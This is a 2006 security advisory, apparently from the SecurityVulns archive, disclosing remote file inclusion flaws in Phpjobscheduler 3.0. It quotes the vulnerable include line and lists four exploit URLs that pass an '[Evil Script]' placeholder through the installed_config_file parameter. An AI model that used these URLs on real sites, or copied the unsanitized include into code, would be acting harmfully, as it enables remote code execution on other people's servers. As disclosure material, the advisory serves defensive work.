Phpjobscheduler 3.0 - Multiple Remote File Include

2006-11-14T00:00:00
ID SECURITYVULNS:DOC:15029
Type securityvulns
Reporter Securityvulns
Modified 2006-11-14T00:00:00

Description

======================================================================

Phpjobscheduler 3.0 - Multiple Remote File Include by Firewall

Application Affect:

               phpjobscheduler 3.0

Source Code:

               http://scripts.ringsworld.com/development-tools/phpjobscheduler.v3.0.zip

Code:

               include_once($installed_config_file)

ExPloit :

http://www.site.com/phpjobschedule_PATH/add-modify.php?installed_config_file=[Evil Script] http://www.site.com/phpjobschedule_PATH/delete.php?installed_config_file=[Evil Script] http://www.site.com/phpjobschedule_PATH/modify.php?installed_config_file=[Evil Script] http://www.site.com/phpjobschedule_PATH/phpjobscheduler.php?installed_config_file=[Evil Script]

Contact:

               Firewall1954@hotmail.com

GrEatZ :

|Her0|slackwaren|Ozzmadark|slappter|ArCaX-ATH|CiberPunk|saok| |Cvir.System|napster|Matasanos|Zlevyn|Azrael|CyberAlexis| |NitroNet|Matasanos|SysRoot|ANtrAX|FaLENcE|Mnox|Xneo.System|

"El ceviche y El pisco es peruano y jamas podran igualar su calidad" "Viva el Peru"

======================================================================